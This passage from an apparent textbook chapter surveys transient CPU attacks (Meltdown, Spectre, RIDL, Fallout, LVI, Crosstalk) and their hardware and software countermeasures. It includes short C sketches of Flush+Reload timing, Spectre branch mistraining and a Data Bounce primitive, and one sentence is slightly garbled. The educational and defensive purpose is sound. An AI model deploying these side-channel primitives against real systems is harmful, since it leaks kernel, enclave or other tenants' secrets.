Modern CPU Microarchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Micro-architectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Transient Micro-architectural Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Meltdown and Spectre-Like Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Micro-architectural Data Sampling Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Prevention-Based Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Detection-Based Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
Abstract
In the last two decades, the evolving cyber-threat landscape has brought to
center stage the contentious trade-offs between security and performance of
modern microprocessors. The guarantees provided by the hardware to ensure
no violation of process boundaries have been shown to be breached in several
real-world scenarios. While modern CPU features such as superscalar, out-of-
order, simultaneous multi-threading, and speculative execution play a critical role
in boosting system performance, they are central to a potent class of security
attacks termed transient micro-architectural attacks. These attacks leverage
shared hardware resources in the CPU that are used during speculative and out-
of-order execution to steal sensitive information. Researchers have used these
attacks to read data from the operating system (OS) and trusted execution
environments (TEEs) and even to break hardware-enforced isolation.
Over the years, several variants of transient micro-architectural attacks have
been developed. While each variant differs in the shared hardware resource
used, the underlying attack follows a similar strategy. This chapter presents a
panoramic view of security concerns in modern CPUs, focusing on the mech-
anisms of these attacks and providing a classification of the variants. Further,
the authors discuss state-of-the-art defense mechanisms towards mitigating these
attacks.
Keywords
Introduction
For over half a century, microprocessor research has focused on improving per-
formance. Various micro-architectural features such as cache memories, branch
prediction, superscalar, speculative, and out-of-order execution were developed to
facilitate this. While some of these features, for example, the cache memory, were
introduced to hide the latency of slow components, others like branch predictors
helped hide overheads due to operations that slow down program execution.
Features like out-of-order execution and speculative execution were introduced
to better utilize available resources. In parallel, features were incorporated in
processors to support better multi-programming. Features such as multi-core
processors and hardware multi-threading allow multiple users
to simultaneously share a processor. These features accelerated new computing
paradigms, especially cloud computing, where multiple users simultaneously share
common hardware, thereby drastically reducing computation costs.
A critical aspect of the cloud computing paradigm is the isolation between
users. To isolate one user’s program from another, security schemes such as pro-
tection rings, segmentation, page table access control bits, virtualization support,
hardware-based security, crypto-accelerators, and trusted execution environments
were introduced. Very soon, it was realized that these security schemes were
insufficient. The shared hardware became a source of information leaks that
could undermine the isolation provided by the processor. These attacks, popularly
known as micro-architectural attacks, made use of shared hardware resources
to glean sensitive information such as cryptographic keys, web pages visited,
user passwords, and keystrokes. Different strategies such as time-driven attacks,
Prime+Probe, Flush+Reload, and Evict+Time were proposed for this purpose. In a
cloud computing environment, these attacks could leak information from one user
to another, in spite of having all security features enabled.
In 2018, two potent micro-architectural attack variants were proposed, namely,
Meltdown (Lipp et al. 2018) and Spectre (Kocher et al. 2019), that exploited
the speculative and out-of-order execution features present in microprocessors.
These attacks leveraged the fact that a processor’s speculation may not always
be correct. When speculation goes wrong, the speculatively executed instructions,
called transient instructions, need to be discarded, and the CPU should be rolled
back to a previous state. However, this rollback is not always perfect. The CPU
would still retain remnants of the transient instructions. Researchers showed how
these remnants can be used to leak secrets. These attacks, which came to be called
transient micro-architectural attacks, could read the contents of any memory region,
including the OS memory. They could also read memory from trusted enclaves, even
though the enclaves used encrypted memory.
Since 2018, there have been several variants of transient micro-architectural
attacks including Zombieload (Schwarz et al. 2019a), Foreshadow (Bulck et al.
2018), Rogue In-Flight Data Load (RIDL) (van Schaik et al. 2019), Fallout (Canella
et al. 2019), Load Value Injection (LVI) (Bulck et al. 2020), and Crosstalk (Ragab
et al. 2021). Each variant found a new vulnerability that could bypass isolation in the
CPU. Many of these attacks are not easily prevented by software patches. For those
that can, the patches have huge performance penalties. It would require fundamental
changes in the CPU design to mitigate these attacks in hardware.
This chapter provides an introduction to transient micro-architectural
attacks. Starting from Meltdown and Spectre, the authors dwell on the basic
principle of the attacks. This is useful in distinguishing between the various
attack classes and discussing the available mitigation techniques. Section “Modern
CPU Microarchitecture” provides a background of modern CPU micro-architecture
and also gives an introduction to micro-architectural attacks. Section “Transient
Micro-architectural Attacks” discusses transient micro-architectural attacks and
classifies them. Section “Countermeasures” discusses the defenses for these attacks,
while the final section has the concluding remarks.
Modern CPU Microarchitecture

Trusted execution environments, such as Intel SGX, encrypt the
enclave code and data present in the DRAM. Decryption is done when the code
or data is fetched into the processor. Thus, the contents of an enclave, when in
RAM, are always in an encrypted form and not accessible to any code outside
the enclave regardless of the privilege levels. In recent years, however, researchers
have shown that such trusted execution environments are not a panacea against
the threat of transient micro-architectural attacks (Bulck et al. 2018; Weisse et al.
2018). The potency of these attacks is one of the reasons that led to the deprecation
of Intel SGX from upcoming desktop processors (Intel Corporation 2021, 2022),
posing further open questions regarding the security of hardware designs. In this
section, we explore the premise of such attacks on the micro-architecture from first
principles, starting with a background on the working of transient instructions in
superscalar CPUs.
Modern CPUs contain numerous internal memory structures. While some of these structures, for instance, the general purpose registers, can be read or modified using instructions
in the ISA, a significant portion of the structures are hidden and inaccessible from
software. To enforce separation between applications, system software ensures that
the data present in the ISA visible shared memory structures of one application
cannot be read or modified by another application. For example, during a context
switch, general purpose registers are either invalidated or loaded with the context of
the next process that executes, thus achieving a temporal separation between the two
processes. In multi-core or multi-threaded CPUs on the other hand, the ISA visible
memory structures are duplicated enforcing spatial separation.
Unlike the visible structures, the hidden memory structures in the CPU, such as
cache memories and branch prediction units, are not always spatially and temporally
separated between applications. They retain their values across context switches and
are possibly shared in multi-core and multi-threaded CPUs. For example, a cache
line that holds data from one application can be evicted by another application.
Similarly, a branch predictor trained on branches in one application can influence
the outcome of a prediction in another application. At first glance, this may seem
innocuous as the structures are hidden from software. However, researchers have
found that one application can indirectly affect another by these shared hidden
memory structures. This has led to a series of security vulnerabilities, commonly
grouped in a category called micro-architectural attacks. The red regions in Fig. 1
are modules in the processor with demonstrated security vulnerabilities. Researchers
have used these vulnerabilities to break cryptographic algorithms, read operating
system data, and break trusted execution environments.
Micro-architectural Attacks
Prime+Probe Attacks. Prime and probe forms the basis for several micro-architectural
attacks. It exploits the variance in the execution time caused by two
applications that contend for the same shared hardware resource. The attack is
discussed by showing an example of how the cache memory can be used to create
a covert channel that transmits one bit of information from a sender to a receiver
(Fig. 2).
Fig. 2 Prime+Probe, Flush+Reload, and Evict+Time are the most common algorithms used to
exfiltrate data in a micro-architectural attack. This figure demonstrates these algorithms in a covert
channel that uses cache memory to transmit one bit of information from a sender to a receiver. (a)
Prime+Probe. (b) Flush+Reload. (c) Evict+Time
(1) In the prime phase, the receiver fills two cache sets, say C0 and C1, with its own
data by performing a sequence of memory operations. (2) To transmit a
message bit, the sender performs a memory operation to evict the receiver’s data
from the corresponding cache set. For example, to transmit a 0, the sender would
evict the receiver’s data from the cache set C0. (3) In the probe phase, the receiver
repeats the memory operations in step (1), but this time also measures the execution
time. Based on the execution time, the receiver can infer the transmitted bit since the
memory access to the evicted cache set would take longer owing to the cache miss.
Prime+Probe in micro-architectural attacks works similarly, except for the fact
that the sender and receiver do not collude. Instead, the receiver primes a sufficient
number of sets in the cache (step (1)), waits for the sender to execute and evict one
or more cache lines in these sets, and then performs a probe similar to step (3) to
identify patterns in the sender’s execution.
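A schematic sketch of the receiver's probe phase on x86 is given below; representing a cache set as an array of line addresses, the helper name and the miss threshold are all assumptions made for illustration.

#include <stdint.h>
#include <x86intrin.h>      /* __rdtscp */

#define MISS_THRESHOLD 150  /* cycles; a platform-dependent assumption */

/* Probe phase: re-access the lines used to prime one cache set and time
 * each access. A slow access indicates that the sender evicted the set.
 * Returns 1 if an eviction (cache miss) is observed, 0 otherwise. */
int probe_set(volatile uint8_t **lines, int n) {
    unsigned int aux;
    for (int i = 0; i < n; i++) {
        uint64_t t0 = __rdtscp(&aux);
        (void)*lines[i];            /* timed reload of a primed line */
        uint64_t t1 = __rdtscp(&aux);
        if (t1 - t0 > MISS_THRESHOLD)
            return 1;               /* miss: the set was evicted */
    }
    return 0;                       /* all hits: set undisturbed */
}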
Transient Micro-architectural Attacks

When transient instructions execute, the hidden states of the CPU are modified.
While the results of a transient operation are discarded after the speculation is
proved wrong, the hidden state of the CPU is not rolled back. Thus, transient
instructions have a permanent impact on the CPU state. Consider, for example, a
code snippet that transiently dereferences an inaccessible pointer and uses the
loaded value to index an array.
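A minimal sketch of such a snippet is shown below; the identifiers ptr, array, i and y match those used later in this chapter, while the scaling factor of 256 is an illustrative assumption.

#include <stdint.h>

extern uint8_t *ptr;              /* points to a byte the program may not read */
extern uint8_t array[256 * 256];  /* probe array under attacker control */

void transient_gadget(void) {
    uint8_t i = *ptr;             /* faults, but may execute transiently */
    uint8_t y = array[i * 256];   /* dependent load: brings a cache line
                                     chosen by the secret value of i */
    (void)y;                      /* architectural results are discarded */
}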
Fig. 3 In a transient attack, the transient instruction modifies the hidden states of CPU like cache
memories, FPU, and ports, in a manner that depends on secret information. In the next stage, the
attacker exfiltrates these secrets from the hidden states
Transient attacks can be divided into two classes based on the micro-architectural medium used for the leakage.
address-controllable transient attacks like Meltdown and Spectre, while the others
are based on micro-architectural data sampling from internal buffers. While at a high
level, the stages in both categories are the same and follow Fig. 3, there are subtle
differences between the two classes. Address-dependent attacks like Meltdown
and Spectre use micro-architectural components like cache memories or branch
prediction units as a medium for leakage. In these attacks, data (or instructions)
placed in strategic memory addresses are transiently loaded (or executed). For
example, in the covert channels described in section “Micro-architectural Attacks”,
an address is used to select a cache set. The choice of the cache set is used as a
medium for information leakage. In micro-architectural data sampling attacks like
Zombieload and Crosstalk, on the other hand, it is not the address that is critical.
Instructions are crafted so as to snoop into internal buffers like re-order buffers,
line-fill buffers, and load and store buffers. Table 1 classifies the known attacks into
these two categories.
Meltdown and Spectre-Like Attacks

These attacks require knowledge of the memory regions of interest, and the attacker
can target them specifically. Attacks like Meltdown (Lipp et al. 2018), Spectre
(Kocher et al. 2019), and Foreshadow (Bulck et al. 2018) fall into this category.
The upcoming sections look into each of these attacks to elaborate on their design
and mechanisms.
Meltdown. CPUs use protection rings to isolate privileged code. For example, Intel
CPUs have four rings: Ring 0 to Ring 3. Privileged code, such as the operating
system’s kernel, is assigned to Ring 0, while user processes are assigned to Ring 3.
The hardware ensures that during regular operations, code executing in Ring 3
cannot read or write to Ring 0, thus isolating the kernel’s code and data from
Fig. 4 Transient execution of a memory load instruction causes data from array to be loaded
into cache memory. Unlike the visible micro-architectural state, the cache contents are not rolled
back when transient instructions are discarded. The contents of the cache can be gleaned using
techniques such as Prime+Probe or Flush+Reload
userspace programs. The Meltdown attack exploits transient execution to read kernel
data from a user program, thus breaching the isolation provided by the protection
rings.
Prior to 2018, the kernel was mapped into the virtual address space of every
process, as shown in Fig. 4. This simplifies system calls and interrupt handling.
Since the kernel was in Ring 0, a user function would not be able to directly access
the kernel. The Meltdown attack showed how a userspace transient memory load or
store operation to a kernel address caused the data to be loaded into the cache mem-
ory. This data could then be gleaned using one of the micro-architectural algorithms
like Prime+Probe or Flush+Reload (section “Micro-architectural Attacks”).
In the first stage of Meltdown, the attacker writes code (Institute of Applied
Information Processing and Communications), as shown in Fig. 4, that performs
a load from a kernel address. Specifically, ptr is made to hold a kernel address.
In the ideal case, this should have immediately created an exception because a user
instruction is trying to read kernel data. However, modern CPUs are designed in
a way that delays the exception, allowing subsequent instructions to be transiently
executed. The contents of the kernel space data would thus be loaded into the register
i, which is then used to load an element from the array into y. During this process,
y is also stored in the cache memory. Notice that the array is indexed based on
the kernel data. All of these instructions are transiently executed. At the time of
throwing the exception, the CPU would discard the new values of i and y, but would
not roll back the cache memory.
In the final stage of Meltdown, either the Flush+Reload or the Prime+Probe can
be used to identify the cache set that holds the loaded array data, thus revealing
information about the kernel data. With the Flush+Reload, for instance, the attacker
would first ensure that all array elements are flushed from the cache before the
transient instructions M1 and M2 execute. Post their execution, exactly one element
corresponding to y would be present in the cache. The cache set that holds y can
be inferred by measuring execution time to load each array element. The cache
set containing y would have the shortest load time due to a cache hit. All other
elements, by virtue of the initial flush, would result in cache misses.
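A sketch of the flush and reload phases on x86 follows; the page-sized stride, the helper names and the use of __rdtscp for timing are implementation choices, not code from the original attack.

#include <stdint.h>
#include <x86intrin.h>     /* _mm_clflush, __rdtscp */

#define STRIDE 4096        /* one page per candidate byte value */
static uint8_t probe_array[256 * STRIDE];

/* Flush phase: evict every probe line from the cache. */
void flush_probe(void) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe_array[i * STRIDE]);
}

/* Reload phase: the index whose access is fastest (a cache hit)
 * corresponds to the byte leaked by the transient loads M1 and M2. */
int reload_leaked_byte(void) {
    unsigned int aux;
    uint64_t best_time = (uint64_t)-1;
    int leaked = -1;
    for (int i = 0; i < 256; i++) {
        volatile uint8_t *p = &probe_array[i * STRIDE];
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;                    /* timed reload */
        uint64_t t1 = __rdtscp(&aux);
        if (t1 - t0 < best_time) { best_time = t1 - t0; leaked = i; }
    }
    return leaked;
}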
Spectre. While the Meltdown attack makes use of an illegal load or store memory
operation to induce a transient execution, Spectre makes use of mispredicted
branches. Modern microprocessors have a Branch Prediction Unit (BPU) that
speculates the direction and the target address of a branch during program execution.
The prediction is done by learning patterns in taken and not-taken branches
from the branch history. For example, consider the following code snippet, where
array1_size is the size of array1 and is used to check the bounds of the index
x. Statements S2 and S3 are executed only if x is within bounds.
S1. if (x < array1_size){
S2. i = array1[x];
S3. y = array2[i * 256];
S4. }
If the snippet is executed repeatedly with legal values of x, the BPU would learn
the execution pattern and speculatively execute statements S2 and S3. The results
in i and y, however, would be committed only after the check x < array1_-
size is completed. After a while of such repeated executions, if x is made illegal
(i.e., x ≥ array1_size), the BPU would predict incorrectly, leading to transiently
executed S2 and S3. The two transient memory operations would load data into
the cache. The misprediction would discard the new values computed for i and y but
not roll back the cache memory. The final stage of Spectre is similar to Meltdown
and uses micro-architectural attack techniques like Evict+Time and Flush+Reload
to glean information about array1[x] from the cache memory. For example, if
array1[x] corresponds to a kernel region, the attack would reveal the contents
of the kernel location.
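The mistraining step can be sketched as follows; this is a simplified outline in which the function names are hypothetical, and real exploits additionally flush array1_size and the probe array from the cache to widen the speculation window.

#include <stddef.h>
#include <stdint.h>

#define ARRAY1_SIZE 16
static uint8_t array1[ARRAY1_SIZE];
static uint8_t array2[256 * 256];
static size_t array1_size = ARRAY1_SIZE;

/* Victim gadget corresponding to statements S1-S3 above. */
static void victim(size_t x) {
    if (x < array1_size) {            /* S1: the branch the BPU learns */
        uint8_t i = array1[x];        /* S2 */
        uint8_t y = array2[i * 256];  /* S3: secret-dependent cache footprint */
        (void)y;
    }
}

/* Train the predictor with in-bounds indices, then supply an
 * out-of-bounds index so that S2 and S3 execute transiently. */
void mistrain_and_attack(size_t malicious_x) {
    for (int k = 0; k < 100; k++)
        victim((size_t)k % array1_size);
    victim(malicious_x);              /* mispredicted as taken */
}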
Spectre is one of the most powerful of all transient attacks because it is very
difficult to mitigate. Over the years, multiple variants of Spectre have been proposed
that exploit the different components of branch speculation in the processor. The
different variants of Spectre attempt to tune different tables in the BPU. For
example, Kocher et al. (2019) and Schwarz et al. (2019b) exploit the Pattern History
Table (PHT), while Bhattacharyya et al. (2019), Chen et al. (2020), and Kocher
et al. (2019) exploit the Branch Target Buffer (BTB), and Koruyeh et al. (2018)
and Maisuradze and Rossow (2018) use the Return Stack Buffer (RSB).
Micro-architectural Data Sampling Attacks
Rogue In-Flight Data Load (RIDL). In traditional cache memories, a cache miss
would block any further memory requests until the cache miss is serviced. In out-of-
order CPUs, addresses corresponding to cache misses are stored in a line-fill buffer
(LFB), so that subsequent memory requests can be serviced. This helps create a
non-blocking cache. On receiving a memory request that results in a cache miss,
an entry in the LFB is created to store the requested address. Subsequently, when
the memory block is fetched, it is stored in the LFB entry corresponding to the
memory address. The block is also stored in the cache memory and forwarded to
the CPU core. The RIDL attack is able to snoop into the line-fill buffer (LFB) to
retrieve the data from the stored block. Interestingly, the attack does not depend on
the address of the memory request, but only requires a cache miss that makes an
entry in the LFB.
RIDL assumes that the attacker and victim share a common L1 cache memory.
The steps of the attack are shown in Fig. 5. The attacker first ensures that buffer is
flushed from the cache and then triggers the victim to execute a load instruction, say at
address A. If this victim’s load results in a miss in the L1 cache, a new entry would
be created in the LFB which would store the physical address of A. The attacker,
running on a different thread in the same core, issues a load to an address present
in a new invalid page. Since this page is new, it would result in a TLB miss and
trigger a page table walk. The CPU would eventually detect that the load request is
from an invalid page and mark it for exception. The exception is however thrown
much later when the operation’s results are committed in order. During this time, the
memory load operation from buffer[1024 * v] would continue transiently,
using an arbitrary value of v picked from an entry in the LFB. The address parts
of the LFB entry are not matched; therefore, with significant probability, the entry
would correspond to the victim’s load request at A, resulting in v holding the value
of the victim’s data d. Thus buffer[1024 * v] is indexed at a location that
is dependent on d. The result is stored in i, as well as in a cache set. After the
exception is thrown due to the illegal address, the transient results in v and i
are discarded; however, the cache is not rolled back. Flush+Reload is then used
to identify i, thus revealing information about the victim's data.
Fig. 5 In the RIDL attack, the attacker (in green) snoops into the line-fill buffer (LFB) to read the
victim's sensitive data present at address A
Fallout. Out-of-order processors hide the latency associated with store operations
by using a store buffer. On encountering a store operation, an entry is created in
the buffer to hold the virtual address, physical address, and the value to be stored
in memory. After the entry is created, subsequent operations in the program can
proceed without waiting for the store to complete. When a later load is issued, the
stored value can be forwarded to it directly from the store buffer (store-to-load
forwarding) under one of two conditions:
• Condition 1. If the complete address in the load matches the complete address
of an entry in the store buffer, then the value in the entry can be directly used.
• Condition 2. If the virtual to physical address translation for the load fails, and a
few least significant bits match with an entry in the store buffer, then the value in
the entry can be speculatively used.
Canella et al. (2019) show how both these conditions
can lead to transient attacks. The attacks arise from the fact that store-to-load
forwarding can happen across security domains. It only requires either of the two
conditions to be met. For example, the value in a store buffer entry will be
forwarded merely because address bits in the entry and in the load
operation match. The store could be from the kernel, while the load could come
from a userspace program.
The first condition leads to an attack called Data Bounce that is used to
identify if a virtual address is valid (i.e., mapped to a physical address). The
pseudo-code is shown in Fig. 6a. This attack can be used to break Address Space
Layout Randomization (ASLR) (PaX; Bhatkar et al. 2003; Xu et al. 2003). The
second condition leads to a vulnerability called Write Transient Forwarding (WTF).
The vulnerability can be used to snoop into stores from another process. Figure 6
provides more details about these attacks.
(a) Data Bounce (speculatively executed; store-to-load forwarding only occurs
if the address ptr is valid, in which case r2 = r1):
DB1. <generate an exception>
DB2. Store ptr, r1
DB3. Load r2, ptr
DB4. <Flush+Reload(r1)>        (exfiltrate r1 using the cache memory)
(b) Write Transient Forwarding (the victim performs a store at address A; B is an
invalid address with the same least significant bits as A; store-to-load forwarding
occurs as per Condition 2 if the entry for A is in the store buffer):
Attacker:
WTF1. Load r1, (B)
WTF2. <Flush+Reload(r1)>       (the transient value in r1 is exfiltrated by
Flush+Reload)
Fig. 6 Fallout makes use of store-to-load forwarding of data in the store buffer to a speculatively
executed load operation. The load operation can be from a different security domain, for example,
the kernel. The result of the load is stored in the r1 register and exfiltrated using Flush+Reload.
Flush+Reload works in a similar way to the previous attacks: the flush is done before the exception-
causing instruction, while the reload is done after the transient execution is discarded. (a) Data
Bounce occurs due to Condition 1. (b) The Write Transient Forwarding vulnerability occurs due to
Condition 2
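As an illustration, the Data Bounce primitive of Fig. 6a can be rendered in C roughly as follows. The sketch assumes a fault-suppression mechanism (e.g., a TSX transaction or a signal handler, omitted here) and reuses the Flush+Reload helpers from the earlier sketch; probe and marker are illustrative names.

#include <stdint.h>

void flush_array(uint8_t *probe);     /* from the Flush+Reload sketch */
int  reload_array(uint8_t *probe);

uint8_t probe[256 * 4096];

/* Returns nonzero if addr has a valid virtual-to-physical mapping.
 * The faulting access must be suppressed (not shown). */
int data_bounce(volatile uint8_t *addr) {
    const int marker = 42;            /* arbitrary test value */
    flush_array(probe);
    /* --- transient window, fault suppressed --- */
    *addr = (uint8_t)marker;          /* DB2: store to the probed address */
    uint8_t v = *addr;                /* DB3: forwarded only if addr is valid */
    (void)probe[v * 4096];            /* DB4: encode v in the cache */
    /* --- end of transient window --- */
    return reload_array(probe) == marker;
}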
Load Value Injection (LVI). LVI (Bulck et al. 2020) reverses the direction of the
Meltdown-type attacks: instead of leaking the victim's data, the attacker injects a
malicious value into the victim's transient execution. An example victim gadget is
the following, where dereferencing trusted_ptr creates a page fault; store-to-load
forwarding under speculation causes untrusted_arg to be passed to trusted_ptr,
making untrusted_arg the base address of an array whose contents can then be
leaked:
*arg_copy = untrusted_arg;
array[**trusted_ptr * 4096];
Fig. 7 In LVI, the attacker injects a malicious value through load forwarding and uses that to leak
sensitive data
The attack proceeds in three steps: (i) The attacker first prepares a malicious value,
loading that in one of the micro-architectural buffers. (ii) The attacker then provokes
the victim into executing instructions that cause a page fault or exception which
triggers this store-to-load data poisoning. This can be done, for instance, by evicting
a set of victim’s virtual memory pages. (iii) Gadget-based secret transmission,
where the attacker finds exploitable code gadgets that can leak data under incorrect
transient execution behavior and lead the victim to that code gadget by carefully
poisoning the data.
Crosstalk. Crosstalk demonstrates that MDS vulnerabilities exist beyond the CPU
core through a shared memory buffer, called staging buffer, that is shared across
multiple CPU cores. The authors identify several micro-instructions that touch the
buffer. These instructions, if executed transiently, can potentially lead to leakage
from one CPU core to another. One use case of Crosstalk is to leak hardware-
generated random numbers produced using Intel's Secure Key Technology. Secure
Key makes use of an off-core hardware random number generator. Seeds are
obtained using the RDSEED instruction, and the random numbers are
read using the RDRAND instruction. These form the basis of several cryptographic
primitives including Intel’s security enclaves. Executing either of these instructions
touches the staging buffer. MDS attacks can be mounted on the buffer by transiently
executing RDRAND and RDSEED, thus leaking the seed or the random numbers
generated by the hardware random number generator.
Countermeasures
Since their discovery, there have been extensive efforts to design and develop
countermeasures for transient micro-architectural attacks. The countermeasures
can be broadly classified as prevention-based or detection-based. Prevention-
based solutions attempt to stop the attack by thwarting the execution at one of
the three phases (see Fig. 3). Naïve preventive solutions, for instance, disable
speculative execution, thus preventing any transient execution, the first stage of
the attack. Another naïve preventive solution disables all timers, thus preventing
timing channels. This would disable stage 3, i.e., the transmission of leakage. In
contrast, detection-based solutions do not disable any feature; rather, they aim to
identify patterns in the program execution that can be attributed to an attack. While
prevention-based solutions have high overheads, detection-based solutions suffer
from false positives. Over the last few years, multiple detection-based
and prevention-based solutions have been proposed. Table 2 provides a list of these
solutions. This section provides a description and analysis of some of these existing
solutions.
Prevention-Based Countermeasures
Figure 3 shows the stages of a transient attack. The attacker first identifies a source
of leakage, as listed in Table 1. The next step involves the transient movement
of data from the source to the medium of leakage. Finally, the attacker uses
techniques established in section “Micro-architectural Attacks” to transfer the secret
information from the medium. Thwarting any of these sequential stages is sufficient
to prevent the attack. Different preventive countermeasures target attacks at different
stages of their execution, as described in Table 2.
Prevention-based countermeasures provide a preemptive solution to these
attacks. While the goal of all solutions is to disable potentially vulnerable behavior
Table 2 Countermeasures for transient micro-architectural attacks are classified as either
prevention-based or detection-based. While prevention-based techniques aim to either modify or
disable some functionality in the software or hardware, detection-based techniques rely on
accurately identifying attacks from their run-time characteristics (HW hardware implementation,
SW software implementation)

Stage of applicability | Paper | HW or SW? | Threat model | Reported overheads
–Prevention-based–
Source of leakage | NDA (Weisse et al. 2019) | HW | Speculative execution attacks | 4–32%
 | Context (Schwarz et al. 2020) | | Spectre-like | 0–338%
 | InvisiSpec (Yan et al. 2019) | | Spectre-like | 5–17%
 | Safespec (Khasawneh et al. 2019) | | Meltdown, Spectre-like | 3%
 | SpectreGuard (Fustos et al. 2019) | | Spectre-like | 8–20%
 | Specshield (Barber et al. 2019) | | Speculative execution attacks | 21%
 | Spectrum (Gonzalez et al. 2018) | | Spectre-like | 2%
 | MuonTrap (Ainsworth and Jones 2020) | | Spectre-like | 4%
 | Invisible speculation (Sakalis et al. 2019) | | Cache and memory side channels | 11%
 | Reversispec (Wu and Qian 2020) | | Speculative load attacks | 8.3%
Medium of leakage | Random-fill (Liu and Lee 2014) | HW | Contention- and reuse-based attacks | Negligible
 | Newcache (Liu et al. 2016) | | Contention- and reuse-based attacks | Negligible
 | CEASER (Qureshi 2018) | | Contention-based attacks | 1%
 | Encrypted-address cache (Qureshi 2019) | | Contention-based attacks | 1%
 | Scattercache (Werner et al. 2019) | | Cache leakage techniques (section “Micro-architectural Attacks”) | 2–4%
 | DAWG (Kiriansky et al. 2018) | | Cache timing attacks | 4–7%
 | SecDCP (Wang et al. 2016) | | Timing side channels | 12.5%
 | MI6 (Bourgeat et al. 2019) | | Spectre-like | 16.4%
Transmission of leakage | Timewarp (Martin et al. 2012) | HW | Timing side channels | Negligible
 | InvarSpec (Zhao et al. 2020) | SW | Speculative execution attacks | (Yan et al. 2019): 10.9%
 | oo7 (Wang et al. 2018) | SW | Spectre-like | 5.9%
 | SPECCFI (Koruyeh et al. 2020) | SW | Spectre-like | 1.9%
–Detection-based–
Transmission of leakage | Cyclone (Harris et al. 2019) | SW | Cache leakage techniques | 3.6%
 | (Chiappetta et al. 2016) | | Cache leakage techniques | –
 | NIGHTs-WATCH (Mushtaq et al. 2018) | | Cache leakage techniques | 2%
 | WHISPER (Mushtaq et al. 2020) | | Cache leakage techniques | –
 | (Alam et al. 2021) | | Cache leakage techniques | –
 | CloudRadar (Zhang et al. 2016) | | Cross VM attacks | 5%
 | CacheShield (Briongos et al. 2018) | | Cross VM attacks | –
of programs, they differ in the attack phase they target. For example, a preventive
solution, called TimeWarp (Martin et al. 2012), fuzzes the timers in order to prevent
attackers from making fine-grained measurements. Such fine-grained measurements
are needed to distinguish between micro-architectural events like cache hits and
misses. Without precise time measurements, the third phase of the attack, namely,
the Flush+Reload, would fail. While most of these solutions are implemented in the
hardware, there are also proposals that work from the software (Koruyeh et al. 2020;
Wang et al. 2018; Yan et al. 2019).
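The idea behind timer fuzzing can be sketched in a few lines of C. This is a toy software model only; TimeWarp itself modifies the hardware timestamp counter, and the epoch size below is an illustrative parameter.

#include <stdint.h>
#include <stdlib.h>
#include <x86intrin.h>

#define EPOCH 1024   /* cycles per observable epoch; illustrative */

/* Coarsen the counter to EPOCH granularity and add random jitter, so a
 * ~50-cycle cache hit and a ~300-cycle miss become indistinguishable. */
uint64_t fuzzed_timestamp(void) {
    unsigned aux;
    uint64_t t = __rdtscp(&aux);
    return (t / EPOCH) * EPOCH + (uint64_t)(rand() % EPOCH);
}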
Another class of preventive solutions partitions the cache memory so that an
attacker cannot interfere with the victim's cache lines. Statically partitioning the
cache among processes, as proposed by Page, prevents such interference but
underutilizes the cache. The partition-locked cache (PLcache) of Wang and Lee
(2007) instead lets a process lock individual cache lines into a private partition; locked
cache lines cannot be evicted by other cache accesses not belonging to the private
partition. In the hardware, each cache line requires additional tags comprising a
flag to indicate if the line is locked and an identifier to indicate the owner of the
cache line. The underutilization of Page’s partitioned cache still persists because
the locked lines cannot be used by other processes, even after the owner no longer
requires them.
Domnitser et al. (2012) provide a low-cost solution to prevent attacks based
on the fact that the cipher evicts one or more lines of the spy data from the cache. The
solution, which requires minor modifications of the replacement policies in cache
memories, restricts an application from holding more than a pre-determined number
of lines in each set of a set-associative cache. With such a cache memory, the spy can
never hold all cache lines in the set; therefore, the probability that the cipher evicts
spy data is reduced. By controlling the number of lines that the spy can hold, a trade-
off between performance and security can be achieved. Over the years, several other
cache partitioning techniques have been suggested (Kiriansky et al. 2018; Sánchez
and Kozyrakis 2011), which strengthen the defense while improving usability.
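The replacement-policy restriction can be sketched as follows for an 8-way set; the quota, field names, and LRU bookkeeping are illustrative, not taken from the paper.

#define WAYS  8
#define QUOTA 4   /* max lines one owner may hold per set; illustrative */

struct line { int valid; int owner; unsigned lru; };

/* Choose a victim way for `requester` on a miss in this set. */
int pick_victim(struct line set[WAYS], int requester) {
    int held = 0, own_lru = -1, any_lru = -1;
    for (int w = 0; w < WAYS; w++) {
        if (!set[w].valid) return w;                     /* free way first */
        if (set[w].owner == requester) {
            held++;
            if (own_lru < 0 || set[w].lru < set[own_lru].lru) own_lru = w;
        }
        if (any_lru < 0 || set[w].lru < set[any_lru].lru) any_lru = w;
    }
    /* At quota: the requester must evict one of its own lines, so it can
     * never occupy a whole set and watch other processes' evictions. */
    return (held >= QUOTA) ? own_lru : any_lru;
}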
Another well-known defense for cache-based attacks makes use of
randomization. Wang and Lee (2007) propose a random-permutation cache
(RPCache), which, as the name suggests, randomizes the cache
interference to make the attack more difficult. The design is based on the fact
that information is leaked only when cache interference is present between two
different processes. RPCache aims at randomizing such interferences so that no
useful information is gleaned. The architecture requires an additional hardware
called the permutation table, which maps the set bits in the effective address to
obtain new set bits. These are then used to index the cache set array. Changing the
contents of the permutation table will invalidate the respective lines in the cache.
This causes additional cache misses and randomization in the cache interference.
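A sketch of the permutation-table lookup is shown below; the table size, line size, and the remap operation are illustrative stand-ins for the hardware described in the paper.

#include <stdint.h>

#define SETS 256                       /* 8 set-index bits; illustrative */

struct rpcache { uint8_t perm[SETS]; };

/* Effective address -> permuted cache set. */
unsigned cache_set(const struct rpcache *c, uintptr_t addr) {
    unsigned set_bits = (addr >> 6) & (SETS - 1);   /* 64-byte lines */
    return c->perm[set_bits];
}

/* Swapping two entries changes the mapping; the lines of the affected
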